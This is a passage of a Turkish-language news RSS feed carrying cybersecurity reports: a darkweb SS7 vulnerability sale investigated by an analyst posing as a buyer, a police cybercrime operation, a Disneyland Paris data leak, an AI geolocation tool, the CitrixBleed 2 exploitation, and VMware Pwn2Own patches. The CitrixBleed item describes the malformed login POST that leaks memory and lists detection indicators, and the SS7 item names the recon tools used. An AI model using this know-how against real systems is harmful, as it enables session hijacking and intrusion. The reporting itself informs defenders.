<description><![CDATA[ Sinyalizasyon Sistemi No.7 (SS7) altyapısındaki kritik bir zafiyet, darkweb üzerinden 5 bin dolara satışa çıkarıldı. Exploit geliştiricisi ve tehdit istihbaratı analisti Doğukan Çalışkan’ın alıcı gibi davranarak gerçekleştirdiği teknik analiz, siber suç ağlarındaki yöntemi tüm detaylarıyla ortaya koydu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484095d0d3.webp" length="25372" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:46:33 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>SS7 açığı nasıl tespit ediliyor, darkwebde açıklar nasıl pazarlanıyor, SIP portları neden hedef alınıyor, RCE açığı nasıl kullanılıyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="451" data-end="852"><strong data-start="451" data-end="484">SS7 nedir ve neden önemlidir?</strong><br data-start="484" data-end="487">SS7 (Sinyalizasyon Sistemi No.7), dünya genelindeki telefon operatörleri arasında arama başlatma, SMS yönlendirme ve dolaşım bilgisi paylaşımı gibi kritik işlemleri yürüten bir sinyal protokolüdür. Ancak bu sistemde yıllardır süregelen yapısal zafiyetler, özellikle konum takibi, çağrı yönlendirme ve kimlik doğrulama atlatma gibi saldırılara olanak tanımaktadır.</p>
<p data-start="854" data-end="1119"><strong data-start="854" data-end="882">Doğukan Çalışkan kimdir?</strong><br data-start="882" data-end="885">Siber tehdit istihbaratı analisti ve exploit geliştiricisi Doğukan Çalışkan, söz konusu zafiyeti darkweb'de tespit etti. Çalışkan, alıcı kimliğiyle tehdit aktörüyle doğrudan iletişime geçti ve süreci teknik olarak kayıt altına aldı.</p>
<p data-start="1121" data-end="1488"><strong data-start="1121" data-end="1152">Darkweb'de SS7 açığı satışı</strong><br data-start="1152" data-end="1155">Haziran 2025'te darkweb forumlarında yapılan bir paylaşımda, bir tehdit aktörü SS7 açığını 5 bin dolara satışa sundu. Paylaşımda, açığın kullanıldığı bir cihaza ait ekran görüntüleri ve nmap taramaları da yer aldı. İlgili cihazda SIP (5060 portu) servisinin açık olduğu ve SS7 protokolünü işleyen servislerin bulunduğu gözlemlendi.</p>
<p data-start="1490" data-end="1829"><strong data-start="1490" data-end="1531">Alıcı gibi davranılarak temas kuruldu</strong><br data-start="1531" data-end="1534">Çalışkan, tehdit aktörüyle TOX mesajlaşma uygulaması üzerinden temasa geçti. İlk etapta doğrudan açık talep edilmedi; dolandırıcılık olup olmadığını anlamak için kanıt talebinde bulunuldu. Aktör, bir cihaz üzerinde SS7 ile ilgili trafiği gösteren verileri ve cihaz tarama sonuçlarını paylaştı.</p>
<p data-start="1831" data-end="2060">Aktörün mesajlarında dikkat çeken bir ifade vardı: ‘Bu hala çalışan bir RCE’ye (uzaktan kod yürütme açığı) dönüştürülmeli’. Bu, satılan açığın ham haliyle teknik bir işlemci tarafından geliştirilmesi gerektiği anlamına geliyor.</p>
<p data-start="2062" data-end="2382"><strong data-start="2062" data-end="2114">Gösterilen teknik veriler neleri ortaya koyuyor?</strong><br data-start="2114" data-end="2117">Aktör, SIP portu açık olan cihazlar üzerinde çalışan bir Apache sunucusu olduğunu ve PHP tabanlı web uygulamasının hedef alındığını belirtti. Bu sistemlerde, CentOS üzerinde çalışan servislerin zafiyetleri tarandı ve bir RCE potansiyelinin bulunduğu iddia edildi.</p>
<p data-start="2384" data-end="2431">Sunulan veriler arasında şunlar dikkat çekti:</p>
<ul data-start="2432" data-end="2589">
<li data-start="2432" data-end="2460">
<p data-start="2434" data-end="2460">Wappalyzer analiz ekranı</p>
</li>
<li data-start="2461" data-end="2495">
<p data-start="2463" data-end="2495">Nmap ile port tarama sonuçları</p>
</li>
<li data-start="2496" data-end="2539">
<p data-start="2498" data-end="2539">sngrep ve ngrep ile izlenen SS7 trafiği</p>
</li>
<li data-start="2540" data-end="2587">
<p data-start="2542" data-end="2587">Hedef cihazda çalışan servislerin detayları</p>
</li>
</ul>
<p data-start="2590" data-end="2756">Ayrıca aktör, Asterisk PBX için kimlik bilgilerine ulaşılabileceğini de dile getirdi. Bu, çağrı yönlendirme gibi işlemler üzerinde kontrol kurma imkânı doğurabilir.</p>
<p data-start="2758" data-end="3113"><strong data-start="2758" data-end="2803">Satış yöntemi ve emanet sistemi kullanımı</strong><br data-start="2803" data-end="2806">Satıcı, dolandırıcılık şüphesine karşı olarak yalnızca emanet sistemleri üzerinden çalışacağını belirtti. Bu tür sistemlerde, ödeme yapıldıktan sonra ürün doğrulanana kadar para emanet hesabında tutuluyor. Çalışkan, işlem öncesi kanıt talep ettiğinde, tehdit aktörü çeşitli teknik ekran görüntüleri sundu.</p>
<p data-start="3115" data-end="3255"><strong data-start="3115" data-end="3159">SS7 zafiyetlerinin potansiyel tehditleri</strong><br data-start="3159" data-end="3162">SS7 altyapısındaki zafiyetler, kötü niyetli kişiler tarafından şu amaçlarla kullanılabilir:</p>
<ul data-start="3256" data-end="3452">
<li data-start="3256" data-end="3293">
<p data-start="3258" data-end="3293">SMS'lerin yeniden yönlendirilmesi</p>
</li>
<li data-start="3294" data-end="3361">
<p data-start="3296" data-end="3361">Çağrıların gizlice dinlenmesi veya başka bir cihaza aktarılması</p>
</li>
<li data-start="3362" data-end="3403">
<p data-start="3364" data-end="3403">Hedef kişinin anlık konumunun tespiti</p>
</li>
<li data-start="3404" data-end="3452">
<p data-start="3406" data-end="3452">İki faktörlü kimlik doğrulamanın atlatılması</p>
</li>
</ul>
<p data-start="3454" data-end="3687">Ancak burada dikkat çeken en önemli unsur, aktörün bu açığı doğrudan çalışır hale getirmediği, yalnızca gerekli teknik altyapıyı sunduğudur. Bu durum, açığın nihai kullanımının daha gelişmiş gruplara bırakıldığını düşündürmektedir.</p>
<p data-start="3689" data-end="3798"><strong data-start="3689" data-end="3724">Kullanılan teknikler ve araçlar</strong><br data-start="3724" data-end="3727">Çalışkan'ın raporladığı olayda öne çıkan araç ve yöntemler şunlardır:</p>
<ul data-start="3799" data-end="4054">
<li data-start="3799" data-end="3860">
<p data-start="3801" data-end="3860"><strong data-start="3801" data-end="3817">Shodan, Fofa</strong> gibi arama motorları ile hedef belirleme</p>
</li>
<li data-start="3861" data-end="3907">
<p data-start="3863" data-end="3907"><strong data-start="3863" data-end="3871">nmap</strong> ile port tarama ve servis tespiti</p>
</li>
<li data-start="3908" data-end="3959">
<p data-start="3910" data-end="3959"><strong data-start="3910" data-end="3927">sngrep, ngrep</strong> ile SIP ve SS7 trafiği izleme</p>
</li>
<li data-start="3960" data-end="4004">
<p data-start="3962" data-end="4004"><strong data-start="3962" data-end="3976">Wappalyzer</strong> ile yazılım sürüm tespiti</p>
</li>
<li data-start="4005" data-end="4054">
<p data-start="4007" data-end="4054">Web zafiyet analizi ve potansiyel RCE tespiti</p>
</li>
</ul>
<p data-start="4056" data-end="4342"><strong data-start="4056" data-end="4088">Gelişmiş grupların radarında</strong><br data-start="4088" data-end="4091">Tehdit aktörünün de belirttiği gibi, bu tür açıklar genellikle teknik olmayan kullanıcılar için değil; fidye yazılımı grupları, gelişmiş sürekli tehdit (APT) ekipleri ve yasa dışı istihbarat ağları için hazırlanmış altyapıların temelini oluşturuyor.</p>
<p data-start="4344" data-end="4513">SS7 açığı gibi altyapısal zafiyetler, sadece bireysel kullanıcıları değil; kurumsal sistemleri, kamu haberleşmesini ve kritik iletişim altyapılarını da hedef alabilir.</p>
<p data-start="4515" data-end="4665"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Ali Yerlikaya: &amp;apos;Siber suçlara karşı 31 ilde düzenlenen operasyonlarda 190 kişi yakalandı&amp;apos;</title>
<link>https://www.ajansexpres.com.tr/ali-yerlikaya-siber-suclara-karsi-31-ilde-duzenlenen-operasyonlarda-190-kisi-yakalandi</link>
<guid>https://www.ajansexpres.com.tr/ali-yerlikaya-siber-suclara-karsi-31-ilde-duzenlenen-operasyonlarda-190-kisi-yakalandi</guid>
<description><![CDATA[ İçişleri Bakanı Ali Yerlikaya, son 3 günde 31 ilde düzenlenen siber suç operasyonlarında 190 şüphelinin yakalandığını duyurdu. Şüphelilerin nitelikli dolandırıcılık, yasa dışı bahis, çocuk müstehcenliği ve para aklama gibi suçlara karıştığı belirtildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484048c61f.webp" length="42344" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:46:28 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Siber suç operasyonu hangi illerde yapıldı, kaç kişi gözaltına alındı, şüpheliler hangi suçlardan yakalandı, ele geçirilen malzemeler neler</media:keywords>
<content:encoded><![CDATA[<p><br data-start="386" data-end="389"><strong data-start="389" data-end="421">31 ilde siber suç operasyonu</strong><br data-start="421" data-end="424">İçişleri Bakanı Ali Yerlikaya, son 3 gün içinde siber suçlara karşı 31 ilde eş zamanlı operasyonlar düzenlendiğini ve bu operasyonlar kapsamında 190 şüphelinin yakalandığını açıkladı.</p>
<p></p>
<p data-start="611" data-end="1130"><strong data-start="611" data-end="666">Dolandırıcılık ve yasa dışı bahis suçları ön planda</strong><br data-start="666" data-end="669">Operasyonlar, nitelikli dolandırıcılık, yasa dışı bahis, çevrimiçi çocuk müstehcenliği ve tacizi gibi suçlara yönelik olarak gerçekleştirildi. Şüphelilerin sosyal medya üzerinden ürün bedeli, dosya masrafı, vergi ücreti, araç kiralama ve kapora gibi bahanelerle vatandaşları dolandırdıkları tespit edildi. Ayrıca, bazı şüphelilerin yasa dışı bahis sitelerinde aktif görev aldığı ve bu sitelerle bağlantılı para transferlerine aracılık ettikleri de belirlendi.</p>
<p data-start="1132" data-end="1542"><strong data-start="1132" data-end="1202">Cumhuriyet Başsavcılıkları ve Emniyet birimleri koordineli çalıştı</strong><br data-start="1202" data-end="1205">Soruşturma süreci, Cumhuriyet Başsavcılıkları ile Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele Daire Başkanlığı'nın koordinasyonunda yürütüldü. Erzurum, Konya, Eskişehir, Sakarya, Gaziantep, Ankara, Mersin, Burdur ve Kocaeli merkezli olmak üzere toplam 31 ilde gerçekleştirilen operasyonlara çok sayıda il emniyet müdürlüğü katıldı.</p>
<p data-start="1544" data-end="1997"><strong data-start="1544" data-end="1578">Suçlamalar ve ele geçirilenler</strong><br data-start="1578" data-end="1581">Yakalanan şüpheliler hakkında 'nitelikli dolandırıcılık', 'yasa dışı bahis', 'suç işlemek amacıyla örgüt kurmak ve üye olmak', 'suçtan elde edilen mal varlığı değerlerini aklamak' ve 'bilişim sistemlerinin kullanılması suretiyle dolandırıcılık' suçlarından işlem başlatıldı. Operasyonlarda çok sayıda dijital materyal, ruhsatsız tabanca ve yaklaşık 15 milyon TL değerinde olduğu belirtilen 10 otomobile el konuldu.</p>
<p data-start="1999" data-end="2187"><strong data-start="1999" data-end="2022">Siber Vatan vurgusu</strong><br data-start="2022" data-end="2025">Yerlikaya, 'Kara Vatan’da olduğu gibi Siber Vatan’da da sanal devriyelerimizle suç ve suçlularla mücadelemize kararlılıkla devam ediyoruz' ifadelerini kullandı.</p>
<p data-start="2189" data-end="2343"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Disneyland Paris&amp;apos;ten 64 GB&amp;apos;lık Dev Veri Sızıntısı: Gizli Planlar ve Mühendislik Belgeleri Ortaya Saçıldı</title>
<link>https://www.ajansexpres.com.tr/disneyland-paristen-64-gblik-dev-veri-sizintisi-gizli-planlar-ve-muhendislik-belgeleri-ortaya-sacildi</link>
<guid>https://www.ajansexpres.com.tr/disneyland-paristen-64-gblik-dev-veri-sizintisi-gizli-planlar-ve-muhendislik-belgeleri-ortaya-sacildi</guid>
<description><![CDATA[ Disneyland Paris’e ait mimari çizimler, mühendislik belgeleri ve sahne arkası görüntüler içeren 64 GB’lık gizli veri arşivi internete sızdırıldı. Sızıntı, Türk yazılımcıların geliştirdiği IntelSonar siber tehdit istihbarat platformunda ilk kez fark edildi. Platformun verileri, siber güvenlik dünyasında büyük ses getirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689484007e8d0.webp" length="32458" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:46:24 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Disneyland veri sızıntısı nasıl gerçekleşti, hangi belgeler sızdırıldı, görüntülerde neler var, endüstriyel casusluk riski nedir</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="441" data-end="858">Fransa’daki Disneyland Paris’e ait son derece gizli mühendislik verileri ve projeler siber saldırı sonucu kamuya sızdırıldı. Toplamda 64 GB’lık veri arşivinde, parkın inşa sürecine dair çok sayıda doküman ve medya dosyası yer alıyor. Sızıntının, Disneyland Paris’in çeşitli tema bölgelerinde çalışan bir taşeron firmanın dijital sistemlerine yapılan izinsiz erişim sonucu gerçekleştiği öğrenildi.</p>
<p data-start="860" data-end="1234"><strong data-start="860" data-end="890">Detaylı planlar sızdırıldı</strong><br data-start="890" data-end="893">Toplamda 39 bin dosyadan oluşan arşiv, Frozen, Pirates of the Caribbean, Phantom Manor ve Big Thunder Mountain gibi popüler alanlara ait detaylı mimari planları, mühendislik hesaplarını, jeolojik raporları ve güvenlik standartlarını içeriyor. Bu belgeler, parkın altyapısal güvenliği ve ticari sırları açısından kritik bilgiler barındırıyor.</p>
<p data-start="1236" data-end="1579"><strong data-start="1236" data-end="1277">Gizli görüntüler de dosyalar arasında</strong><br data-start="1277" data-end="1280">Sızdırılan belgeler arasında 4 binden fazla fotoğraf ve video bulunuyor. Bu görüntüler, Disneyland çalışanlarının gizlilik sözleşmeleriyle korunan alanlarda çekildiği tahmin edilen sahne arkası görüntülerden oluşuyor. Videolar ve fotoğraflar, eğlence parkının yapım aşamalarını gözler önüne seriyor.</p>
<p data-start="1581" data-end="1885"><strong data-start="1581" data-end="1611">Endüstriyel casusluk riski</strong><br data-start="1611" data-end="1614">Uzmanlar, bu tür büyük çaplı sızıntıların yalnızca marka güvenliğini değil, aynı zamanda eğlence parkı sektöründe faaliyet gösteren diğer firmalar için de ciddi bir casusluk fırsatı oluşturduğunu belirtiyor. Disneyland Paris yönetimi ise henüz resmi bir açıklama yapmadı.</p>
<p data-start="1581" data-end="1885"><strong data-start="80" data-end="120">Siber güvenlik uzmanlarının odağında</strong><br data-start="120" data-end="123">Olayla ilgili detaylara <strong data-start="147" data-end="165">intelsonar </strong>platformu üzerinden erişilebiliyor. Yerli yazılımcılar tarafından geliştirilen bu platform, siber tehdit istihbaratı alanında öne çıkan güncel çözümlerden biri olarak dikkat çekiyor. IntelSonar, bu tür sızıntıların erken aşamada tespiti ve analizi konusunda önemli bir araç haline geldi.</p>
<p><strong data-start="1887" data-end="1899">Disneyland Paris'ten 64 GB'lık Dev Veri Sızıntısı: Gizli Planlar ve Mühendislik Belgeleri Ortaya Saçıldı</strong></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Yapay Zeka Destekli IntelSonar ile Görüntü Üzerinden Konum Tespiti Duyuruldu</title>
<link>https://www.ajansexpres.com.tr/yapay-zeka-destekli-intelsonar-ile-goeruntu-uzerinden-konum-tespiti-duyuruldu</link>
<guid>https://www.ajansexpres.com.tr/yapay-zeka-destekli-intelsonar-ile-goeruntu-uzerinden-konum-tespiti-duyuruldu</guid>
<description><![CDATA[ Siber güvenlik ve istihbarat alanında çalışan Doğukan Çalışkan, geliştirdikleri IntelSonar sistemiyle yalnızca görüntü verisi kullanılarak coğrafi konum tespiti yapılabildiğini açıkladı. Sistem, Ortadoğu gibi zorlu bölgelerde %92 doğrulukla test edildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689483a71ccfc.webp" length="20272" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:55 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>IntelSonar tam olarak nasıl çalışıyor, sistem hangi alanlarda kullanılabilecek, yapay zeka hangi coğrafi verileri analiz ediyor, açık beta süreci ne zaman başlayacak</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="473" data-end="846">Siber güvenlik ve açık kaynak istihbarat alanlarında çalışmalar yürüten Doğukan Çalışkan, yeni geliştirdikleri IntelSonar adlı coğrafi konum belirleme sistemini duyurdu. Görüntü işleme ve yapay zeka teknolojileriyle hazırlanan sistem, sadece görsel içerik üzerinden, ek bir veri veya kullanıcı girişi gerektirmeden fotoğrafların çekildiği koordinatları tespit edebiliyor.</p>
<p data-start="848" data-end="1221">Çalışkan'ın açıklamasına göre, IntelSonar özellikle EXIF verisi bulunmayan, bulanık veya referans noktası içermeyen görüntülerde dahi yüksek doğruluk oranı sağlıyor. Sistem, büyük ölçekli coğrafi veri kümeleriyle eğitilmiş derin öğrenme motoru sayesinde, arazi yapısı, bitki örtüsü, kentsel doku, gölge ve ışık yönü gibi unsurları analiz ederek konum tahmini yapabiliyor.</p>
<p data-start="1223" data-end="1557">Yapılan son testlerde IntelSonar, çöl ve kentsel sınır bölgeleri gibi zorlu alanlarda %92'nin üzerinde doğruluk oranına ulaştı. Çalışkan, sistemin askeri ve savunma amaçlı durum tespitinden insani yardım koordinasyonuna, afet haritalandırmadan medya ve çatışma doğrulama süreçlerine kadar birçok alanda kullanılabileceğini belirtti.</p>
<p data-start="1559" data-end="1673">Henüz kapalı test aşamasında olan IntelSonar'ın, önümüzdeki dönemde açık beta sürümünün duyurulması planlanıyor.</p>
<p data-start="1675" data-end="1859"><strong data-start="1675" data-end="1687"></strong></p>
<p></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>CitrixBleed 2 açığının kamuya duyurulmadan önce hedefli saldırılarda kullanıldığı ortaya çıktı</title>
<link>https://www.ajansexpres.com.tr/citrixbleed-2-aciginin-kamuya-duyurulmadan-oence-hedefli-saldirilarda-kullanildigi-ortaya-cikti</link>
<guid>https://www.ajansexpres.com.tr/citrixbleed-2-aciginin-kamuya-duyurulmadan-oence-hedefli-saldirilarda-kullanildigi-ortaya-cikti</guid>
<description><![CDATA[ Citrix NetScaler cihazlarını etkileyen kritik güvenlik açığı CVE-2025-5777’nin, kamuya açık PoC kodları yayınlanmadan yaklaşık iki hafta önce Çin kaynaklı IP adreslerinden gelen saldırılarda kullanıldığı belirlendi. Buna rağmen Citrix, uzun süre aktif istismarları reddetti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_689483a25059c.webp" length="41534" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:50 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CitrixBleed 2 açığı nasıl çalışıyor, hangi tarihler arasında istismar edildi, Citrix neden saldırıları geç açıkladı, hangi sektörler hedef alındı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="430" data-end="669">Citrix NetScaler ürünlerini etkileyen ve "CitrixBleed 2" olarak adlandırılan kritik güvenlik açığı CVE-2025-5777’nin, kamuya açık istismar kodları paylaşılmadan önce siber saldırganlar tarafından hedefli biçimde kullanıldığı tespit edildi.</p>
<p data-start="671" data-end="937">Siber güvenlik firması GreyNoise, 23 Haziran 2025 tarihinde honeypot sistemlerinin bu açığın hedef alındığı saldırıları algıladığını duyurdu. Bu tarih, kamuya açık ilk proof-of-concept (PoC) kodunun yayınlandığı 4 Temmuz’dan yaklaşık iki hafta öncesine denk geliyor.</p>
<p data-start="939" data-end="1417">GreyNoise, 7 Temmuz’da açığı takip etmek için özel bir etiket oluşturduğunu ve bu etiket sayesinde geçmiş verilerdeki saldırı girişimlerinin de görünür hale geldiğini bildirdi. Şirket ayrıca, ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı’na (CISA) 9 Temmuz’da açığın aktif olarak kullanıldığını teyit etti. Bunun üzerine CISA, CVE-2025-5777’yi bilinen istismar edilen güvenlik açıkları (KEV) listesine ekleyerek federal kurumlara bir gün içinde yama uygulanması talimatı verdi.</p>
<p data-start="1419" data-end="1874"><strong data-start="1419" data-end="1442">Citrix sessiz kaldı</strong><br data-start="1442" data-end="1445">GreyNoise tarafından sağlanan istismar kodlarıyla yapılan doğrulamalara göre, saldırılar doğrudan CitrixBleed 2 açığını hedef alıyordu. Ancak Citrix, bu saldırılara ilişkin kamuoyunu zamanında bilgilendirmedi. Güvenlik araştırmacısı Kevin Beaumont’un defalarca yaptığı uyarılara rağmen, şirket 26 Haziran’da yayınladığı güvenlik blog yazısını 11 Temmuz’a kadar sessizce güncelledi ve saldırıların varlığını doğrudan kabul etmedi.</p>
<p data-start="1876" data-end="2177">Citrix, 15 Temmuz’da NetScaler sistemlerinde güvenlik ihlali belirtilerinin nasıl tespit edileceğine ilişkin yeni bir blog gönderisi yayınladı. Buna karşın, bazı araştırmacılar, şirketin istismar göstergelerini (IOC) kendileriyle paylaşıldığı halde açıklamadığını ve şeffaf davranmadığını öne sürüyor.</p>
<p data-start="2179" data-end="2717"><strong data-start="2179" data-end="2206">Açığın teknik detayları</strong><br data-start="2206" data-end="2209">CitrixBleed 2, NetScaler sistemlerinde oturum açma işlemleri sırasında yetersiz giriş doğrulaması nedeniyle ortaya çıkan bir bellek aşımı açığı olarak tanımlanıyor. Saldırganlar, "login=" parametresinde eşittir işareti kullanmadan gönderilen POST istekleriyle cihazdan 127 baytlık bellek verisini dışarı sızdırabiliyor. Horizon3 ve WatchTowr araştırmacıları, bu yöntemin geçerli oturum anahtarlarının ele geçirilmesi için kullanılabildiğini, böylece saldırganların yetkisiz erişim sağlayabileceğini gösterdi.</p>
<p data-start="2719" data-end="3041">Kevin Beaumont, "/doAuthentication.do" yoluna yapılan tekrar eden POST isteklerinin ve "Content-Length: 5" başlığı içeren isteklerin istismar belirtileri olabileceğini belirtti. Ayrıca, kullanıcı adı alanında olağandışı karakterler (örneğin "#") içeren oturum sonlandırmaları da dikkat çekici bulgular arasında yer alıyor.</p>
<p data-start="3043" data-end="3534"><strong data-start="3043" data-end="3081">Citrix’in önerileri yetersiz kaldı</strong><br data-start="3081" data-end="3084">Citrix, istismar edilen oturumların sonlandırılması için ICA ve PCoIP oturumlarının kill komutlarıyla sonlandırılmasını önerdi. Ancak Beaumont, bu yaklaşımın yetersiz olduğunu, SSH, Telnet, RDP ve AAA oturumlarının da ayrı ayrı sonlandırılması gerektiğini ifade etti. Ayrıca sistem yöneticilerine, oturumlar sonlandırılmadan önce olağandışı IP adres değişiklikleri veya yetkisiz kullanıcı girişleri açısından günlük kayıtlarını incelemeleri önerildi.</p>
<p data-start="3536" data-end="3833"><strong data-start="3536" data-end="3564">Tespit ve yayılma durumu</strong><br data-start="3564" data-end="3567">Beaumont’a göre, açık 20 Haziran’dan itibaren kullanılmaya başlandı ve takip eden günlerde yaygınlaştı. Araştırmacı, saldırıların dikkatle seçilmiş hedeflere yönelik olduğunu ve saldırganların NetScaler cihazlarını doğrulamak için profil oluşturduklarını ifade etti.</p>
<p data-start="3835" data-end="4013">Öte yandan, Imperva tarafından yapılan açıklamaya göre, ürünleri 11,5 milyonun üzerinde istismar girişimi tespit etti. Bu saldırıların yaklaşık %40’ı finans sektörünü hedef aldı.</p>
<p data-start="4015" data-end="4240">Citrix, NetScaler ADC ve Gateway için güvenlik yamaları yayınladı ve kullanıcıların desteklenen sürümlere acilen geçmeleri gerektiğini duyurdu. 12.1 ve 13.0 gibi destek dışı sürümler için herhangi bir geçici çözüm bulunmuyor.</p>
<p data-start="4247" data-end="4409"><strong data-start="4247" data-end="4259"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>VMware, Pwn2Own Berlin&amp;apos;de sıfır gün açıklarıyla istismar edilen dört kritik ESXi güvenlik açığını yamaladı</title>
<link>https://www.ajansexpres.com.tr/vmware-pwn2own-berlinde-sifir-gun-aciklariyla-istismar-edilen-doert-kritik-esxi-guvenlik-acigini-yamaladi</link>
<guid>https://www.ajansexpres.com.tr/vmware-pwn2own-berlinde-sifir-gun-aciklariyla-istismar-edilen-doert-kritik-esxi-guvenlik-acigini-yamaladi</guid>
<description><![CDATA[ Pwn2Own Berlin 2025 etkinliğinde güvenlik araştırmacıları tarafından istismar edilen ve VMware ESXi, Workstation, Fusion ve Tools ürünlerini etkileyen dört sıfır gün açığı için şirket güncellemeler yayımladı. Açıklardan üçü 9.3 şiddet derecesine sahip ve sanal makinelerden ana sisteme kod çalıştırılmasına olanak tanıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_6894839db9657.webp" length="43546" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:45 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Hangi VMware ürünleri etkilendi, açıklar nasıl istismar edildi, güncelleme dışında çözüm var mı, Pwn2Own Berlinde hangi ödüller verildi</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="490" data-end="730">VMware, sanallaştırma ürünlerini etkileyen ve Pwn2Own Berlin 2025 yarışmasında istismar edilen dört sıfır gün açığına yönelik güvenlik güncellemeleri yayımladı. Güncellemeler VMware ESXi, Workstation, Fusion ve Tools yazılımlarını kapsıyor.</p>
<p data-start="732" data-end="926">Söz konusu açıkların üçü, saldırganların sanal makineden ana sisteme geçerek komut çalıştırmasına olanak tanıyan yüksek önemdeki zafiyetler olarak tanımlanıyor. Bu açıklar şu şekilde listelendi:</p>
<ul data-start="928" data-end="1483">
<li data-start="928" data-end="1081">
<p data-start="930" data-end="1081"><strong data-start="930" data-end="949">CVE-2025-41236:</strong> VMXNET3 sanal ağ adaptöründe bulunan tamsayı taşması açığı. Bu zafiyet, STARLabs SG’den Nguyen Hoang Thach tarafından kullanıldı.</p>
</li>
<li data-start="1082" data-end="1295">
<p data-start="1084" data-end="1295"><strong data-start="1084" data-end="1103">CVE-2025-41237:</strong> VMCI (Virtual Machine Communication Interface) bileşeninde tamsayı alt taşması sonucu oluşan out-of-bounds yazma hatası. Açık, REverse Tactics’ten Corentin Bayet tarafından istismar edildi.</p>
</li>
<li data-start="1296" data-end="1483">
<p data-start="1298" data-end="1483"><strong data-start="1298" data-end="1317">CVE-2025-41238:</strong> PVSCSI (Paravirtualized SCSI) kontrolcüsünde bulunan heap overflow zafiyeti. Bu açık, Synacktiv’ten Thomas Bouzerar ve Etienne Helluy-Lafont tarafından kullanıldı.</p>
</li>
</ul>
<p data-start="1485" data-end="1533">Bu üç zafiyetin her biri 9.3 CVSS puanına sahip.</p>
<p data-start="1535" data-end="1803"><strong data-start="1535" data-end="1572">Bilgi sızdırma açığı da kapatıldı</strong><br data-start="1572" data-end="1575">Dördüncü açık olan <strong data-start="1594" data-end="1612">CVE-2025-41239</strong>, bilgi sızdırılmasına neden olabilecek bir zafiyet olarak tanımlandı ve 7.1 şiddet puanı aldı. Bu açık da Corentin Bayet tarafından tespit edildi ve CVE-2025-41237 ile zincirleme kullanıldı.</p>
<p data-start="1805" data-end="2186"><strong data-start="1805" data-end="1838">Yama dışında çözüm bulunmuyor</strong><br data-start="1838" data-end="1841">VMware, bu güvenlik açıkları için herhangi bir geçici çözüm (workaround) sunmadığını açıkladı. Bu nedenle kullanıcıların ve kurumların sistemlerini koruyabilmesi için en son sürümlere güncelleme yapmaları gerekiyor. Özellikle CVE-2025-41239’un VMware Tools for Windows ürününü etkilediği ve farklı bir güncelleme yöntemi gerektirdiği belirtildi.</p>
<p data-start="2188" data-end="2383">Açıkların tamamı, Mayıs 2025’te gerçekleştirilen Pwn2Own Berlin yarışmasında gösterildi. Etkinlikte güvenlik araştırmacıları toplam 29 sıfır gün açığı ortaya koyarak 1.078.750 dolar ödül kazandı.</p>
<p data-start="2390" data-end="2543"><strong data-start="2390" data-end="2402"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft, Excel’de Yüksek Riskli Dosyalara Verilen Dış Bağlantıları Aşamalı Olarak Devre Dışı Bırakacak</title>
<link>https://www.ajansexpres.com.tr/microsoft-excelde-yuksek-riskli-dosyalara-verilen-dis-baglantilari-asamali-olarak-devre-disi-birakacak</link>
<guid>https://www.ajansexpres.com.tr/microsoft-excelde-yuksek-riskli-dosyalara-verilen-dis-baglantilari-asamali-olarak-devre-disi-birakacak</guid>
<description><![CDATA[ Microsoft, Ekim 2025’ten itibaren Excel’de engellenen dosya türlerine verilen dış bağlantıları varsayılan olarak engellemeye başlayacak. Bu değişiklik, güvenlik açıklarını azaltmayı ve kötü amaçlı yazılım risklerini önlemeyi hedefliyor. Yeni ayar, grup ilkesi ve kayıt defteri üzerinden yönetilebilecek. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68948398a3bff.webp" length="24682" type="image/jpeg"/>
<pubDate>Thu, 07 Aug 2025 13:44:40 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Excel dış bağlantı güvenliği nasıl değişecek, engellenen dosya türleri hangileri, yeni grup ilkesi nasıl yapılandırılacak</media:keywords>
<content:encoded><![CDATA[<h2>Microsoft, Excel'de Yeni Güvenlik Önlemi Getiriyor</h2>
